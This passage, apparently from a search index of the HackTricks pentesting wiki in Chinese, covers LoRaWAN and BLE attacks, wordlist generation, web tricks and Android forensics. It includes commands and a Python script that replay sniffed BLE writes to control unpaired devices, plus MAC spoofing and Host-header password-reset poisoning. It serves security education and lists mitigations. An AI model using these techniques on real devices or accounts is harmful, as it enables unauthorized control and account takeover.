Semtech UDP 输入 LoRaPWN Trend Micro Python 工具,用于暴力 OTAA,生成下行链路,解密有效载荷 2023 年发布演示,SDR 无关 LoRAttack 多通道嗅探器 + 重放,使用 USRP;导出 PCAP/LoRaTap 良好的 Wireshark 集成 gr-lora / gr-lorawan GNU Radio OOT 块,用于基带 TX/RX 自定义攻击的基础","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 攻击工具 (2025)","id":"10442","title":"攻击工具 (2025)"},"10443":{"body":"优先选择具有真正随机 DevNonce 的 OTAA 设备;监控重复项。 强制执行 LoRaWAN 1.1 :32 位帧计数器,独特的 FNwkSIntKey / SNwkSIntKey。 将帧计数器存储在非易失性存储器中 ( ABP ) 或迁移到 OTAA。 部署 安全元件 (ATECC608A/SX1262-TRX-SE) 以保护根密钥免受固件提取。 禁用远程 UDP 数据包转发端口 (1700/1701) 或使用 WireGuard/VPN 限制。 保持网关更新;Kerlink/Dragino 提供 2024 年修补的镜像。 实施 流量异常检测 (例如,LAF 分析器) - 标记计数器重置、重复加入、突然的 ADR 变化。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 防御建议 (渗透测试者检查清单)","id":"10443","title":"防御建议 (渗透测试者检查清单)"},"10444":{"body":"LoRaWAN 审计框架 (LAF) – https://github.com/IOActive/laf Trend Micro LoRaPWN 概述 – https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Low-Power Wide Area Network » 参考文献","id":"10444","title":"参考文献"},"10445":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Pentesting BLE - 蓝牙低功耗","id":"10445","title":"Pentesting BLE - 蓝牙低功耗"},"10446":{"body":"自 Bluetooth 4.0 规范以来,BLE 只使用 40 个信道,覆盖 2400 到 2483.5 MHz 的范围。相比之下,传统 Bluetooth 在相同范围内使用 79 个信道。 BLE 设备通过发送 advertising packets ( beacons )来通信,这些数据包向附近的设备广播该 BLE 设备的存在。这些 beacons 有时也会 发送数据 。 监听设备,也称为 central device,可以对 advertising packet 使用专门发送给该广告设备的 SCAN request 进行响应。对该扫描的 response 使用与 advertising packet 相同的结构,但包含一些无法放入初始 advertising 请求的附加信息,例如完整的设备名称。 前导字节用于同步频率,而四字节的 access address 是一个 connection identifier ,用于多个设备尝试在相同信道上建立连接的场景。接下来,Protocol Data Unit( PDU )包含 advertising data 。PDU 有多种类型;最常用的是 ADV_NONCONN_IND 和 ADV_IND。如果设备 不接受连接 ,则使用 ADV_NONCONN_IND PDU 类型,仅在 advertising packet 中传输数据。如果设备 允许连接 ,则使用 ADV_IND ,并在 connection 建立后停止发送 advertising packets。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » 介绍","id":"10446","title":"介绍"},"10447":{"body":"Generic Attribute Profile (GATT)定义了 设备应如何格式化和传输数据 。在分析 BLE 设备的攻击面时,你通常会将注意力集中在 GATT(或 GATTs)上,因为它决定了 如何触发设备功能 以及数据如何被存储、分组和修改。GATT 将设备的 characteristics、descriptors 和 services 以 16 位或 32 位值的表格形式列出。 Characteristic 是在 central device 和 peripheral 之间 发送 的 数据 值。这些 characteristics 可以有 descriptors ,用于 提供关于它们的附加信息 。如果为了执行特定操作而相关, characteristics 通常会被 分组 到 services 中。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » GATT","id":"10447","title":"GATT"},"10448":{"body":"bash hciconfig #Check config, check if UP or DOWN\\n# If DOWN try:\\nsudo modprobe -c bluetooth\\nsudo hciconfig hci0 down && sudo hciconfig hci0 up # Spoof MAC\\nspooftooph -i hci0 -a 11:22:33:44:55:66","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » 枚举","id":"10448","title":"枚举"},"10449":{"body":"GATTool 允许与另一设备 建立 连接 ,列出该设备的 特征 ,并读取和写入其属性。 GATTTool 可以使用 -I 选项启动交互式 shell: bash gatttool -i hci0 -I\\n[ ][LE]> connect 24:62:AB:B1:A8:3E Attempting to connect to A4:CF:12:6C:B3:76 Connection successful\\n[A4:CF:12:6C:B3:76][LE]> characteristics\\nhandle: 0x0002, char properties: 0x20, char value handle:\\n0x0003, uuid: 00002a05-0000-1000-8000-00805f9b34fb\\nhandle: 0x0015, char properties: 0x02, char value handle:\\n0x0016, uuid: 00002a00-0000-1000-8000-00805f9b34fb\\n[...] # Write data\\ngatttool -i -b --char-write-req -n \\ngatttool -b a4:cf:12:6c:b3:76 --char-write-req -a 0x002e -n $(echo -n \\"04dc54d9053b4307680a\\"|xxd -ps) # Read data\\ngatttool -i -b --char-read -a 0x16 # Read connecting with an authenticated encrypted connection\\ngatttool --sec-level=high -b a4:cf:12:6c:b3:76 --char-read -a 0x002c","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » GATTool","id":"10449","title":"GATTool"},"1045":{"body":"在谷歌中搜索 所使用技术的默认凭据,或 尝试这些链接 : https://github.com/ihebski/DefaultCreds-cheat-sheet http://www.phenoelit.org/dpl/dpl.html http://www.vulnerabilityassessment.co.uk/passwordsC.htm https://192-168-1-1ip.mobi/default-router-passwords-list/ https://datarecovery.com/rd/default-passwords/ https://bizuns.com/default-passwords-list https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv https://github.com/Dormidera/WordList-Compendium https://www.cirt.net/passwords http://www.passwordsdatabase.com/ https://many-passwords.github.io/ https://theinfocentric.com/","breadcrumbs":"Brute Force - CheatSheet » 默认凭据","id":"1045","title":"默认凭据"},"10450":{"body":"bash # Start listening for beacons\\nsudo bettercap --eval \\"ble.recon on\\"\\n# Wait some time\\n>> ble.show # Show discovered devices\\n>> ble.enum # This will show the service, characteristics and properties supported # Write data in a characteristic\\n>> ble.write \\n>> ble.write ff06 68656c6c6f # Write \\"hello\\" in ff06","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Bettercap","id":"10450","title":"Bettercap"},"10451":{"body":"许多低成本的 BLE 外设不会强制执行 pairing/bonding。没有 bonding,Link Layer 加密永远不会启用,因此 ATT/GATT 流量是明文的。一个 off-path sniffer 可以跟踪连接,解码 GATT 操作以获取 characteristic handles and values,任何附近的主机随后可以连接并重放那些 writes 来控制设备。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Sniffing and actively controlling unpaired BLE devices","id":"10451","title":"Sniffing and actively controlling unpaired BLE devices"},"10452":{"body":"硬件:一块 Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352),刷写了 NCC Group 的 Sniffle 固件。 Install Sniffle and its Wireshark extcap on Linux: bash if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then\\necho \\"[+] - Sniffle not installed! Installing at 1.10.0...\\"\\nsudo mkdir -p /opt/sniffle\\nsudo chown -R $USER:$USER /opt/sniffle\\npushd /opt/sniffle\\nwget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz\\ntar xvf v1.10.0.tar.gz\\n# Install Wireshark extcap for user and root only\\nmkdir -p $HOME/.local/lib/wireshark/extcap\\nln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap\\nsudo mkdir -p /root/.local/lib/wireshark/extcap\\nsudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap\\npopd\\nelse\\necho \\"[+] - Sniffle already installed at 1.10.0\\"\\nfi 将 Sonoff 刷入 Sniffle 固件(确保你的串口设备匹配,例如 /dev/ttyUSB0): bash pushd /opt/sniffle/\\nwget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex\\ngit clone https://github.com/sultanqasim/cc2538-bsl.git\\ncd cc2538-bsl\\npython3 -m venv .venv\\nsource .venv/bin/activate\\npython3 -m pip install pyserial intelhex\\npython3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex\\ndeactivate\\npopd 通过 Wireshark 的 Sniffle extcap 捕获,并通过过滤快速 pivot 到会改变状态的写入: text _ws.col.info contains \\"Sent Write Command\\" 这突出显示了 ATT Write Commands 来自客户端;handle and value 通常直接映射到设备动作(例如,向 buzzer/alert characteristic 写入 0x01,写入 0x00 停止)。 Sniffle CLI 快速示例: bash python3 scanner.py --output scan.pcap\\n# Only devices with very strong signal\\npython3 scanner.py --rssi -40\\n# Filter advertisements containing a string\\npython3 sniffer.py --string \\"banana\\" --output sniff.pcap Alternative sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin 也可用。在小型/廉价的 Nordic dongles 上,你通常会覆盖 USB bootloader 以加载 sniffer firmware,因此你要么保留一个专用的 sniffer dongle,要么需要使用 J-Link/JTAG 在之后恢复 bootloader。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Sniffing with Sniffle (CC26x2/CC1352)","id":"10452","title":"Sniffing with Sniffle (CC26x2/CC1352)"},"10453":{"body":"一旦你从 sniffed traffic 中识别出可写的 characteristic handle 和对应的 value,就以任意 central 身份连接并发出相同的 write: With Nordic nRF Connect for Desktop (BLE app): 选择 nRF52/nRF52840 dongle,扫描并连接到目标。 浏览 GATT database,定位目标 characteristic(通常有友好名称,例如 Alert Level)。 使用 sniffed bytes 执行 Write(例如,01 触发,00 停止)。 Automate on Windows with a Nordic dongle using Python + blatann: python import time\\nimport blatann # CONFIG\\nCOM_PORT = \\"COM29\\" # Replace with your COM port\\nTARGET_MAC = \\"5B:B1:7F:47:A7:00\\" # Replace with your target MAC target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + \\",p\\") # CONNECT\\nble_device = blatann.BleDevice(COM_PORT)\\nble_device.configure()\\nble_device.open()\\nprint(f\\"[-] Connecting to {TARGET_MAC}...\\")\\npeer = ble_device.connect(target_address).wait()\\nif not peer:\\nprint(\\"[!] Connection failed.\\")\\nble_device.close()\\nraise SystemExit(1) print(\\"Connected. Discovering services...\\")\\npeer.discover_services().wait(5, exception_on_timeout=False) # Example: write 0x01/0x00 to a known handle\\nfor service in peer.database.services:\\nfor ch in service.characteristics:\\nif ch.handle == 0x000b: # Replace with your handle\\nprint(\\"[!] Beeping.\\")\\nch.write(b\\"\\\\x01\\")\\ntime.sleep(2)\\nprint(\\"[+] And relax.\\")\\nch.write(b\\"\\\\x00\\") print(\\"[-] Disconnecting...\\")\\npeer.disconnect()\\npeer.wait_for_disconnect()\\nble_device.close()","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » Active control via GATT","id":"10453","title":"Active control via GATT"},"10454":{"body":"优先在 Linux 上使用 Sonoff+Sniffle,以实现稳健的信道跳变和连接跟踪。保留一个备用的 Nordic sniffer 作为后备。 如果没有 pairing/bonding,任何附近的攻击者都可以观察到写操作并重放/构造自己的写入到未认证的可写特征。 缓解措施:要求 pairing/bonding 并强制加密;将特征权限设置为需要经过认证的写入;尽量减少未认证的可写特征;使用 Sniffle/nRF Connect 验证 GATT ACLs。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » 运行注意事项和缓解措施","id":"10454","title":"运行注意事项和缓解措施"},"10455":{"body":"Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners Sniffle – A sniffer for Bluetooth 5 and 4.x LE Firmware installation for Sonoff USB Dongle (Sniffle README) Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P) Nordic nRF Sniffer for Bluetooth LE nRF Connect for Desktop blatann – Python BLE library for Nordic devices tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Pentesting BLE - Bluetooth Low Energy » References","id":"10455","title":"References"},"10456":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Test LLMs » 测试 LLMs","id":"10456","title":"测试 LLMs"},"10457":{"body":"","breadcrumbs":"Test LLMs » 本地运行和训练模型","id":"10457","title":"本地运行和训练模型"},"10458":{"body":"Hugging Face Transformers 是使用、训练和部署 LLM(如 GPT、BERT 等)最流行的开源库之一。它提供了一个全面的生态系统,包括预训练模型、数据集,以及与 Hugging Face Hub 的无缝集成,以便进行微调和部署。","breadcrumbs":"Test LLMs » Hugging Face Transformers","id":"10458","title":"Hugging Face Transformers"},"10459":{"body":"LangChain 是一个旨在构建 LLM 应用程序的框架。它允许开发人员将语言模型与外部数据源、API 和数据库连接。LangChain 提供了用于高级提示工程、管理对话历史和将 LLM 集成到复杂工作流中的工具。","breadcrumbs":"Test LLMs » LangChain","id":"10459","title":"LangChain"},"1046":{"body":"尽可能多地收集目标的信息并生成自定义字典。可能有帮助的工具:","breadcrumbs":"Brute Force - CheatSheet » 创建你自己的字典","id":"1046","title":"创建你自己的字典"},"10460":{"body":"LitGPT 是由 Lightning AI 开发的一个项目,利用 Lightning 框架来促进基于 GPT 的模型的训练、微调和部署。它与其他 Lightning AI 工具无缝集成,提供优化的工作流程,以处理大规模语言模型,增强性能和可扩展性。","breadcrumbs":"Test LLMs » LitGPT","id":"10460","title":"LitGPT"},"10461":{"body":"描述: LitServe 是 Lightning AI 提供的一个部署工具,旨在快速高效地部署 AI 模型。它通过提供可扩展和优化的服务能力,简化了 LLM 在实时应用中的集成。","breadcrumbs":"Test LLMs » LitServe","id":"10461","title":"LitServe"},"10462":{"body":"Axolotl 是一个基于云的平台,旨在简化 AI 模型(包括 LLM)的部署、扩展和管理。它提供自动扩展、监控和与各种云服务集成等功能,使在生产环境中部署模型变得更加容易,而无需广泛的基础设施管理。","breadcrumbs":"Test LLMs » Axolotl","id":"10462","title":"Axolotl"},"10463":{"body":"","breadcrumbs":"Test LLMs » 在线尝试模型","id":"10463","title":"在线尝试模型"},"10464":{"body":"Hugging Face 是一个领先的机器学习平台和社区,特别以其在自然语言处理(NLP)方面的工作而闻名。它提供工具、库和资源,使开发、共享和部署机器学习模型变得更加容易。 它提供几个部分,如: 模型 :一个庞大的 预训练机器学习模型 库,用户可以浏览、下载和集成用于文本生成、翻译、图像识别等各种任务的模型。 数据集: 一个全面的 数据集集合 ,用于训练和评估模型。它便于访问多样的数据源,使用户能够找到并利用数据以满足其特定的机器学习项目。 空间: 一个用于托管和共享 互动机器学习应用程序 和演示的平台。它允许开发人员 展示 他们的模型,创建用户友好的界面,并通过共享实时演示与他人合作。","breadcrumbs":"Test LLMs » Hugging Face","id":"10464","title":"Hugging Face"},"10465":{"body":"TensorFlow Hub 是一个由 Google 开发的可重用机器学习模块的综合库。它专注于促进机器学习模型的共享和部署,特别是那些使用 TensorFlow 构建的模型。 模块: 一个庞大的预训练模型和模型组件的集合,用户可以浏览、下载和集成用于图像分类、文本嵌入等任务的模块。 教程: 逐步指南和示例,帮助用户理解如何使用 TensorFlow Hub 实现和微调模型。 文档: 综合指南和 API 参考,帮助开发人员有效利用库中的资源。","breadcrumbs":"Test LLMs » TensorFlow Hub & Kaggle","id":"10465","title":"TensorFlow Hub & Kaggle"},"10466":{"body":"Replicate 是一个平台,允许开发人员通过简单的 API 在云中运行机器学习模型。它专注于使 ML 模型易于访问和部署,而无需广泛的基础设施设置。 模型: 一个由社区贡献的机器学习模型库,用户可以浏览、尝试并将模型集成到他们的应用程序中,几乎不需要努力。 API 访问: 简单的 API 用于运行模型,使开发人员能够轻松地在自己的应用程序中部署和扩展模型。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Test LLMs » Replicate","id":"10466","title":"Replicate"},"10467":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Burp Suite » Burp Suite","id":"10467","title":"Burp Suite"},"10468":{"body":"简单列表: 仅包含每行一个条目的列表 运行时文件: 在运行时读取的列表(不加载到内存中)。用于支持大列表。 大小写修改: 对字符串列表应用一些更改(不变,转为小写,转为大写,转为专有名词 - 首字母大写,其余小写 -,转为专有名词 - 首字母大写,其余保持不变)。 数字: 生成从 X 到 Y 的数字,使用 Z 步长或随机生成。 暴力破解: 字符集,最小和最大长度。 https://github.com/0xC01DF00D/Collabfiltrator : 用于执行命令并通过 DNS 请求获取输出的有效载荷到 burpcollab。 https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e https://github.com/h3xstream/http-script-generator tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Burp Suite » 基本有效载荷","id":"10468","title":"基本有效载荷"},"10469":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Other Web Tricks » 其他网络技巧","id":"10469","title":"其他网络技巧"},"1047":{"body":"bash crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet\\ncrunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst) @ Lower case alpha characters\\n, Upper case alpha characters\\n% Numeric characters\\n^ Special characters including spac\\ncrunch 6 8 -t ,@@^^%%","breadcrumbs":"Brute Force - CheatSheet » Crunch","id":"1047","title":"Crunch"},"10470":{"body":"几次后端信任 Host header 来执行某些操作。例如,它可能会使用其值作为 发送密码重置的域 。因此,当您收到一封带有重置密码链接的电子邮件时,使用的域是您在 Host header 中输入的域。然后,您可以请求其他用户的密码重置,并将域更改为您控制的域,以窃取他们的密码重置代码。 WriteUp 。 warning 请注意,您甚至可能不需要等待用户点击重置密码链接来获取令牌,因为可能连 垃圾邮件过滤器或其他中介设备/机器人都会点击它进行分析 。","breadcrumbs":"Other Web Tricks » 主机头","id":"10470","title":"主机头"},"10471":{"body":"有时,当您正确完成某些验证时,后端会 仅将值为 \\"True\\" 的布尔值添加到您的会话的安全属性中 。然后,另一个端点将知道您是否成功通过了该检查。 然而,如果您 通过了检查 ,并且您的会话在安全属性中获得了 \\"True\\" 值,您可以尝试 访问其他资源 ,这些资源 依赖于相同的属性 ,但您 不应该有权限 访问。 WriteUp 。","breadcrumbs":"Other Web Tricks » 会话布尔值","id":"10471","title":"会话布尔值"},"10472":{"body":"尝试以已存在用户的身份注册。也尝试使用等效字符(点、多个空格和 Unicode)。","breadcrumbs":"Other Web Tricks » 注册功能","id":"10472","title":"注册功能"},"10473":{"body":"注册一个电子邮件,在确认之前更改电子邮件,然后,如果新的确认电子邮件发送到第一个注册的电子邮件,您可以接管任何电子邮件。或者,如果您可以启用第二个电子邮件以确认第一个电子邮件,您也可以接管任何账户。","breadcrumbs":"Other Web Tricks » 接管电子邮件","id":"10473","title":"接管电子邮件"},"10474":{"body":"Jira Service Management","breadcrumbs":"Other Web Tricks » 访问使用 atlassian 的公司内部服务台","id":"10474","title":"访问使用 atlassian 的公司内部服务台"},"10475":{"body":"开发人员可能会忘记在生产环境中禁用各种调试选项。例如,HTTP TRACE 方法是为诊断目的而设计的。如果启用,web 服务器将通过在响应中回显收到的确切请求来响应使用 TRACE 方法的请求。这种行为通常是无害的,但偶尔会导致信息泄露,例如可能由反向代理附加到请求的内部身份验证头的名称。 Image for post Image for post tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Other Web Tricks » TRACE 方法","id":"10475","title":"TRACE 方法"},"10476":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Android Forensics » Android Forensics","id":"10476","title":"Android Forensics"},"10477":{"body":"要开始从 Android 设备提取数据,设备必须解锁。如果设备被锁定,您可以: 检查设备是否启用了 USB 调试。 检查是否存在可能的 smudge attack 尝试使用 Brute-force","breadcrumbs":"Android Forensics » 锁定设备","id":"10477","title":"锁定设备"},"10478":{"body":"创建一个 android backup using adb 并使用 Android Backup Extractor 提取: java -jar abe.jar unpack file.backup file.tar","breadcrumbs":"Android Forensics » 数据获取","id":"10478","title":"数据获取"},"10479":{"body":"cat /proc/partitions (搜索闪存的路径,通常第一个条目是 mmcblk0 ,对应整个闪存)。 df /data (发现系统的块大小)。 dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (使用从块大小收集的信息执行)。","breadcrumbs":"Android Forensics » 如果有 root 访问或物理连接到 JTAG 接口","id":"10479","title":"如果有 root 访问或物理连接到 JTAG 接口"},"1048":{"body":"bash # Cewl gets words from the victims page\\ncewl example.com -m 5 -w words.txt # Tok (https://github.com/tomnomnom/hacks/tree/master/tok) gets words from a list of URLs\\ncat /path/to/urls.txt | tok # https://github.com/m4ll0k/BBTz/blob/master/getjswords.py gets words from a list of JS URLs\\ncat /path/to/js-urls.txt | python3 getjswords.py","breadcrumbs":"Brute Force - CheatSheet » 基于网站的字典列表","id":"1048","title":"基于网站的字典列表"},"10480":{"body":"使用 Linux Memory Extractor (LiME) 提取 RAM 信息。这是一个应该通过 adb 加载的内核扩展。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Android Forensics » 内存","id":"10480","title":"内存"},"10481":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Online Platforms with API » 在线平台与API","id":"10481","title":"在线平台与API"},"10482":{"body":"您可以查询某个IP是否与可疑/恶意活动相关。完全免费。","breadcrumbs":"Online Platforms with API » ProjectHoneypot","id":"10482","title":"ProjectHoneypot"},"10483":{"body":"检查IP地址是否与注册账户的机器人相关。它还可以检查用户名和电子邮件。最初免费。","breadcrumbs":"Online Platforms with API » BotScout","id":"10483","title":"BotScout"},"10484":{"body":"查找和验证电子邮件。 一些API请求免费,更多需要付费。 商业?","breadcrumbs":"Online Platforms with API » Hunter","id":"10484","title":"Hunter"},"10485":{"body":"查找与IP和域名相关的恶意活动。免费。","breadcrumbs":"Online Platforms with API » AlientVault","id":"10485","title":"AlientVault"},"10486":{"body":"查找与电子邮件(其他平台上的个人资料)、域名(基本公司信息、邮件和员工)和公司(从邮件获取公司信息)相关的个人数据。 您需要付费才能访问所有功能。 商业?","breadcrumbs":"Online Platforms with API » Clearbit","id":"10486","title":"Clearbit"},"10487":{"body":"网站使用的技术。昂贵... 商业?","breadcrumbs":"Online Platforms with API » BuiltWith","id":"10487","title":"BuiltWith"},"10488":{"body":"检查主机(域名或IP)是否与可疑/恶意活动相关。提供一些免费API访问。 商业?","breadcrumbs":"Online Platforms with API » Fraudguard","id":"10488","title":"Fraudguard"},"10489":{"body":"检查主机(域名或IP)是否与可疑/恶意活动相关。提供一些免费API访问。","breadcrumbs":"Online Platforms with API » FortiGuard","id":"10489","title":"FortiGuard"},"1049":{"body":"根据你对受害者的了解(姓名、日期等)生成密码。 python3 cupp.py -h","breadcrumbs":"Brute Force - CheatSheet » CUPP","id":"1049","title":"CUPP"},"10490":{"body":"指示主机是否与垃圾邮件活动相关。提供一些免费API访问。","breadcrumbs":"Online Platforms with API » SpamCop","id":"10490","title":"SpamCop"},"10491":{"body":"基于意见和其他指标判断域名是否与可疑/恶意信息相关。","breadcrumbs":"Online Platforms with API » mywot","id":"10491","title":"mywot"},"10492":{"body":"获取IP地址的基本信息。您每月可以测试最多100K次。","breadcrumbs":"Online Platforms with API » ipinfo","id":"10492","title":"ipinfo"},"10493":{"body":"该平台提供有关域名和IP地址的信息,如IP内的域名或域名服务器内的域名、由电子邮件拥有的域名(查找相关域名)、域名的IP历史(查找CloudFlare背后的主机)、使用某个名称服务器的所有域名.... 您有一些免费访问权限。","breadcrumbs":"Online Platforms with API » securitytrails","id":"10493","title":"securitytrails"},"10494":{"body":"允许通过电子邮件、域名或公司名称进行搜索,并检索相关的“个人”信息。它还可以验证电子邮件。有一些免费访问。","breadcrumbs":"Online Platforms with API » fullcontact","id":"10494","title":"fullcontact"},"10495":{"body":"即使在免费/社区版本中,也提供大量有关域名和IP的信息。","breadcrumbs":"Online Platforms with API » RiskIQ","id":"10495","title":"RiskIQ"},"10496":{"body":"搜索域名、IP和电子邮件并获取泄露信息。提供一些免费访问。","breadcrumbs":"Online Platforms with API » _IntelligenceX","id":"10496","title":"_IntelligenceX"},"10497":{"body":"通过IP搜索并收集与可疑活动相关的信息。提供一些免费访问。","breadcrumbs":"Online Platforms with API » IBM X-Force Exchange","id":"10497","title":"IBM X-Force Exchange"},"10498":{"body":"通过IP或IP范围搜索并获取有关扫描互联网的IP的信息。15天免费访问。","breadcrumbs":"Online Platforms with API » Greynoise","id":"10498","title":"Greynoise"},"10499":{"body":"获取IP地址的扫描信息。提供一些免费API访问。","breadcrumbs":"Online Platforms with API » 